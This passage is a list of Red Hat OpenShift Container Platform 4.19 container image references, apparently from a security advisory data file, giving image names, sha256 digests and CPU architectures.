"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
